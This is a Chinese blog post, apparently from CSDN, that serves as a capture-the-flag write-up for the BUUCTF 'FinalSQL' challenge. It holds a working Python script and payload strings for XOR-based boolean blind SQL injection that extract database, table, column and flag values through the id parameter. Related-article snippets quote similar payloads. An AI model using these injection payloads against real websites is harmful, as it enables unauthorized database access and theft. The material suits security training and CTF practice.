[极客大挑战 2019]FinalSQL

最新推荐文章于 2024-02-23 21:33:47 发布
最新推荐文章于 2024-02-23 21:33:47 发布
阅读量314 收藏 1
点赞数 1
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/127492990
版权

以及给你提示了

依次点击1,2,3,4,5

发现GET传参,这里可能是注入点

可以先fuzz试一下,发现过滤了挺多,但是没过滤 ^

可以使用异或:相同为0 不同为1

正确时:0^1

错误时:0^0

脚本:

import requests
import time

url="http://da5c6481-fdd8-4dc2-912a-8732691bd08b.node4.buuoj.cn:81/search.php"

# 0^(ord(substr(database(),1,1))>32)
def getDatabase():
    database_name=""
    for x in range(1,1000):
        low = 32
        hight = 127
        mid=(low+hight)//2
        while low < hight:
            params={
                "id":"0^(ord(substr((select(database())),"+str(x)+",1))>"+str(mid)+")"
            }
            r=requests.get(url=url,params=params)
            if "others~~~" in r.text:
                low = mid+1
            else:
                hight = mid
            mid=(low+hight)//2
        if low <=32 or hight >= 127:
            break
        database_name += chr(mid)
        print("数据库为:",database_name)

def getTable(): # 获取表名
    tables_name = ""
    for x in range(1,1000):
        left = 32
        right = 127
        mid=(left+right)//2
        while left < right:
            params = {
                "id" : "0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(x)+",1))>"+str(mid)+")"
            }
            r=requests.get(url=url,params=params)
            if "others~~~" in r.text:
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if left < 32 or right > 127:
            break
        tables_name += chr(mid)
        print("table:",tables_name)
        time.sleep(1)
#  F1naI1y,Flaaaaag
def getColmun():
    column_name=""
    for x in range(1,1000):
        left=32
        right=127
        mid=(left+right)//2
        while left<right:
            while left < right:
                params = {
                    "id": "0^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y'))," + str(x) + ",1))>" + str(mid) + ")"
                }
                r = requests.get(url=url, params=params)
                if "others~~~" in r.text:
                    left = mid + 1
                else:
                    right = mid
                mid = (left + right) // 2
            if left < 32 or right > 127:
                break
            column_name += chr(mid)
            print("column:",  column_name)
            time.sleep(1)

def getFlag():
    flag=""
    for x in range(1,1000):
        left=32
        right=127
        mid=(left+right)//2
        while left<right:
            while left < right:
                params = {
                    "id": "0^(ord(substr((select(group_concat(password))from(F1naI1y))," + str(x) + ",1))>" + str(mid) + ")"
                }
                r = requests.get(url=url, params=params)
                if "others~~~" in r.text:
                    left = mid + 1
                else:
                    right = mid
                mid = (left + right) // 2
            if left < 32 or right > 127:
                break
            flag += chr(mid)
            print("flag:",  flag)
            time.sleep(1)
getDatabase()
getTable()
getColmun()
getFlag()

爆破数据库

0^(ord(substr((select(database())),"+str(x)+",1))>"+str(mid)+")

爆破数据表

0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(x)+",1))>"+str(mid)+")

爆破列

0^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema='F1naI1y')),"+str(x)+",1))>"+str(mid)+")

获取flag

0^(ord(substr((select(group_concat(password))from(F1naI1y))," + str(x) + ",1))>" + str(mid) + ")

超级兵_140
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[极客挑战 2019]FinalSQL - 异或盲注
oZuoShen123的博客
10-05 480
1、这题的关键是找注入点,如果选择用户名、密码作为输入点就麻烦了 2、注入点:按钮,点击就传id;当id=1时,提示Click others   可以利用id的特性,构造异或匹配   payload: f"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{j},1))={i})^1"   payload有两个异或:1^表达式^1
BUUCTF [极客挑战 2019]FinalSQL
qq_60829702的博客
10-21 1291
因为之前的几道盲注题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
[极客挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 414
[极客挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
BUUCTF-[极客挑战 2019]FinalSQL
weixin_44016181的博客
09-15 376
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
[极客挑战 2019]FinalSQL(bypass盲注)
qq_56313338的博客
09-06 730
这里是数字型注入,使用异或进行爆破
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
盲注脚本爆数据库之[极客挑战 2019]FinalSQL
qq_58970968的博客
08-11 444
当过滤的东西很多很多的时候,可以考虑盲注,用 ^ 来判断是否可以进行脚本注入;使用二分法查找数据库的每一个字母;到时候只需要改回显的关键字和url就行。
sql注入 [极客挑战 2019]FinalSQL1
最新发布
m0_75178803的博客
02-23 909
逻辑符号|会被检测到,而&感觉成了注释符,&之后的内容都被替换掉了。直接盲注比较慢,还需要利用二分法来编写脚本。这里直接令传入的id=6。传入id=1^1^1。这里利用到大佬的脚本。运行一下得到flag。
[极客挑战 2019]FinalSQL 1
plant1234的博客
04-30 1915
[极客挑战 2019]FinalSQL 1 首先打开题目,发现是一个sql注入: 寻找注入点发现注入点在: 发现是一个盲注,且过滤了and和空格等 并且直接盲注比较慢,还需要利用二分法来编写脚本 大佬脚本: import requests url = "http://b4d7330a-4880-41c4-a20c-3dae55d11c37.node4.buuoj.cn:81/search.php" flag = '' def payload(i, j): sql = "1^(ord(
buuctf web finalsql
qq_41696858的博客
12-31 408
没啥好说的,经典爆破,随便点一个数字,点1,会跳转到search.php?id=1 把1改成0,会报错error,经典布尔盲注,buuctf,原生爆破想都不要想,二分查找吧 先手动测试 payload?id=1^1 error payload ?id=1^0 NO! Not this! Click others~~~ 测试成功,脚本爆破 import re import requests import string import time url = "http://a3a385c8-781e-4ee7-
Final 关键字详解。
勿忘初心的博客
05-05 216
Final 关键字的简单使用 1、 被final关键字 修饰的类不可以被子类继承。 2、 被final关键字修饰的方法,无法被子类重写。 3、 被final关键字修饰的基本变量,值不可以被改变, 4、被修饰的引用变量,不能修改地址值,但是可以对指向对象的内部进行修改。 eg: 代码很简单,看不懂只是你没用心看。 被final关键字 修饰的类不可以被子类继承。 被final关键字修饰的方法,无法...
BUUCTF__web题解合集(六)
风过江南乱的博客
08-12 771
1、[BJDCTF 2nd]简单注入 2、[NCTF2019]Fake XML cookbook 3、[MRCTF2020]PYWebsite 4、[极客挑战 2019]FinalSQL 5、[GKCTF2020]老八小超市儿
buuctf 极客挑战 finalsql
SopRomeo的博客
02-05 1499
说来话长,这边记录下,页面不一样了,之前的注入全部行不通,考虑到最烦最难得盲注,利用二分法查找是非常快的 这边记下playload 查库名:id=1^(ascii(substr((select(database())),1,1))>1)^1 库名为geek 查表名:id=1^(ascii(substr((select(group_concat(table_name))from(inform...
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值